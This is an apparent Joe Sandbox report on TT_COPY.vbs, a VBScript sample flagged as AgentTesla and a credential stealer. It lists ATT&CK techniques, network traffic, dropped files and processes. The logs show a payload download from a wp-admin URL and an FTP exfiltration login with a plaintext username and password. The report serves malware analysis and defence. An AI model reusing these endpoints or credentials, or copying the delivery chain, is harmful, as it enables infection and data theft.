          Execution: 211 Windows Management Instrumentation; 321 Scripting; 21 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 11 Process Injection; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 321 Scripting; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 241 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection
          Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: 1 File and Directory Discovery; 115 System Information Discovery; 221 Security Software Discovery; 1 Process Discovery; 241 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Network Sniffing; Network Service Scanning
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: 1 Exfiltration Over Alternative Protocol; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 2 Non-Application Layer Protocol; 22 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
          No Antivirus matches

          Source | Detection | Scanner | Label
          http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
          http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po | 0% | Avira URL Cloud | safe
          http://OowQOv.com | 0% | Avira URL Cloud | safe
          ftp://ftp.mcmprint.netnoffice | 0% | Avira URL Cloud | safe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | Avira URL Cloud | safe
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | Avira URL Cloud | safe
          https://wNUxderhdqerb.org | 0% | Avira URL Cloud | safe
          http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16 | 0% | Avira URL Cloud | safe
          http://go.micros | 0% | Avira URL Cloud | safe

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          ftp.mcmprint.net | 185.31.121.136 | true | false | | unknown
          b3solutionscws.com | 192.185.145.188 | true | false | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16 | false | Avira URL Cloud: safe | unknown

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://OowQOv.com | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://127.0.0.1:HTTP/1.1 | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
          https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://b3solutionscws.com/wp-admin/ZCaVuIfIpDLfuryX16po | CasPol.exe, 00000007.00000002.6650313755.00000000010DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2164704518.0000026A961B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://wNUxderhdqerb.org | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          ftp://ftp.mcmprint.netnoffice | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://go.micros | CasPol.exe, 00000007.00000002.6650870632.00000000010F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi | CasPol.exe, 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

          IP | Domain | Country | ASN | ASN Name | Malicious
          192.185.145.188 | b3solutionscws.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
          185.31.121.136 | ftp.mcmprint.net | Bulgaria | 199364 | RAX-ASBG | false

          Joe Sandbox Version: 36.0.0 Rainbow Opal
          Analysis ID: 758166
          Start date and time: 2022-12-01 15:47:21 +01:00
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 13m 47s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: TT_COPY.vbs
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name: Suspected Instruction Hammering
          Number of analysed new started processes analysed: 14
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal96.troj.spyw.evad.winVBS@7/4@2/2
          EGA Information:
          • Successful, ratio: 50%
          HDC Information: Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 169
          • Number of non-executed functions: 2
          Cookbook Comments:
          • Found application associated with file extension: .vbs
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
          • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, login.live.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, wdcp.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 2556 because it is empty
          • Not all processes were analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • VT rate limit hit for: TT_COPY.vbs
                  No simulations
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:@...e...........................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):30
                                      Entropy (8bit):3.964735178725505
                                      Encrypted:false
                                      SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                      MD5:9F754B47B351EF0FC32527B541420595
                                      SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                      SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                      SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                      Malicious:false
                                      Preview:NordVPN directory not found!..
                                      File type:ASCII text, with CRLF line terminators
                                      Entropy (8bit):5.882508768775152
                                      TrID:
                                        File name:TT_COPY.vbs
                                        File size:319816
                                        MD5:a27bc40b7cf1e7e7e7a9b38221d4e849
                                        SHA1:d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
                                        SHA256:28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf
                                        SHA512:b6bbcd0f8e6fa19acc91441f41f9f277a11399b15071ce06acbae4771954bba33e0acf7ee279498bfd701a3beec55c54687a25c579a54be9adcbfa2c133731f8
                                        SSDEEP:6144:T2J71kKaq/0xBIAbO0uzJ44bQ+YwMpXj/3CAS/Sv5Hx5QS:TBKd/0UAbO0q44jkTbvL5QS
                                        TLSH:CF645990AD3B55900E4BA71AFBF149CD4FF30FE3F1012F9B29B45246372A3689A19197
                                        File Content Preview:Smigesparcelwisecisal = ChrW(11202)......on error resume next ..Tilendebringerlateenrigg186 = FileLen("Lassoers89")......Dveskolenliveborns = Ucase(Trim(Mid("Referencerne",27,150)) ) ......BESPARINGERNESUNDERSPR = Space(35)....'LIVSFRELSERNE Concocted BYG
                                        Icon Hash:e8d69ece869a9ec4
                                        Dec 1, 2022 15:50:08.440023899 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440104961 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440119028 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440188885 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440234900 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440256119 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440339088 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440377951 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440395117 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440459013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440474987 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440515995 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440527916 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440540075 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440551996 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440566063 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440577030 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440587044 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440598011 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440614939 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440628052 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440639973 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440649033 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440653086 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440668106 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440680027 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440691948 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440702915 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440715075 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440726995 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440737963 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440749884 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440762043 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440773964 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440784931 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440797091 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440809011 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440819979 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440831900 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440844059 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440845013 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.440864086 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440877914 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440890074 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440901041 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440912962 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440924883 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440936089 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440948009 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440959930 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440970898 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440983057 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.440994978 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441005945 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441018105 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441025019 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025019 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025019 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441025972 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441034079 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441047907 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441047907 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441047907 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441051960 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441066980 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441072941 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441072941 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441083908 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441097975 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.441121101 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441219091 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.441289902 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557050943 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557151079 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557178974 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557190895 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557203054 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557205915 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557230949 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557245016 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557256937 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557275057 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557275057 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557277918 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557293892 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557306051 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557318926 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557322979 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557323933 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557323933 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557341099 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557353973 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557365894 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557410002 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557420969 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557440996 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:08.557470083 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557518959 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:08.557568073 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:13.319366932 CET8049824192.185.145.188192.168.11.20
                                        Dec 1, 2022 15:50:13.319550037 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:50:15.844718933 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:15.876802921 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:15.876933098 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:15.910717964 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:15.911051989 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:15.943064928 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:15.943161011 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:15.943381071 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:16.014626980 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:19.780215979 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:19.783906937 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:19.816060066 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:19.816215038 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:50:19.816740990 CET2149825185.31.121.136192.168.11.20
                                        Dec 1, 2022 15:50:19.816981077 CET4982521192.168.11.20185.31.121.136
                                        Dec 1, 2022 15:51:57.762777090 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:51:58.074925900 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:51:58.684145927 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:51:59.887095928 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:52:02.292809010 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:52:07.104397058 CET4982480192.168.11.20192.185.145.188
                                        Dec 1, 2022 15:52:16.711529970 CET4982480192.168.11.20192.185.145.188
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 1, 2022 15:50:07.807889938 CET | 53604 | 53 | 192.168.11.20 | 1.1.1.1
Dec 1, 2022 15:50:07.826406956 CET | 53 | 53604 | 1.1.1.1 | 192.168.11.20
Dec 1, 2022 15:50:15.606538057 CET | 52412 | 53 | 192.168.11.20 | 1.1.1.1
Dec 1, 2022 15:50:15.837896109 CET | 53 | 52412 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 1, 2022 15:50:07.807889938 CET | 192.168.11.20 | 1.1.1.1 | 0xab96 | Standard query (0) | b3solutionscws.com | A (IP address) | IN (0x0001) | false
Dec 1, 2022 15:50:15.606538057 CET | 192.168.11.20 | 1.1.1.1 | 0xa887 | Standard query (0) | ftp.mcmprint.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 1, 2022 15:50:07.826406956 CET | 1.1.1.1 | 192.168.11.20 | 0xab96 | No error (0) | b3solutionscws.com |  | 192.185.145.188 | A (IP address) | IN (0x0001) | false
Dec 1, 2022 15:50:15.837896109 CET | 1.1.1.1 | 192.168.11.20 | 0xa887 | No error (0) | ftp.mcmprint.net |  | 185.31.121.136 | A (IP address) | IN (0x0001) | false
                                        • b3solutionscws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49824 | 192.185.145.188 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2022 15:50:07.952996969 CET | 223 | OUT | GET /wp-admin/ZCaVuIfIpDLfuryX16 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: b3solutionscws.com
Cache-Control: no-cache
Dec 1, 2022 15:50:08.081645966 CET | 225 | IN | HTTP/1.1 200 OK
Date: Thu, 01 Dec 2022 14:50:08 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Wed, 30 Nov 2022 23:29:13 GMT
Accept-Ranges: bytes
Content-Length: 213568


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 1, 2022 15:50:15.910717964 CET | 21 | 49825 | 185.31.121.136 | 192.168.11.20 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 16:50. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Dec 1, 2022 15:50:15.911051989 CET | 49825 | 21 | 192.168.11.20 | 185.31.121.136 | USER noffice@mcmprint.net
Dec 1, 2022 15:50:15.943161011 CET | 21 | 49825 | 185.31.121.136 | 192.168.11.20 | 331 User noffice@mcmprint.net OK. Password required
Dec 1, 2022 15:50:15.943381071 CET | 49825 | 21 | 192.168.11.20 | 185.31.121.136 | PASS 2K-0}h.[5hb)
Dec 1, 2022 15:50:19.780215979 CET | 21 | 49825 | 185.31.121.136 | 192.168.11.20 | 530 Login authentication failed
Dec 1, 2022 15:50:19.816060066 CET | 21 | 49825 | 185.31.121.136 | 192.168.11.20 | 530 Logout.

                                        Target ID:0
                                        Start time:15:50:14
                                        Start date:01/12/2022
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
                                        Imagebase:0x7ff6961b0000
                                        File size:170496 bytes
                                        MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Target ID:2
                                        Start time:15:50:34
                                        Start date:01/12/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Imagebase:0x7ff7287a0000
                                        File size:452608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:moderate

                                        Target ID:3
                                        Start time:15:50:34
                                        Start date:01/12/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7b44d0000
                                        File size:875008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:4
                                        Start time:15:50:36
                                        Start date:01/12/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Imagebase:
                                        File size:433152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Target ID:7
                                        Start time:15:50:54
                                        Start date:01/12/2022
                                        Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                        Imagebase:0x9b0000
                                        File size:106496 bytes
                                        MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate

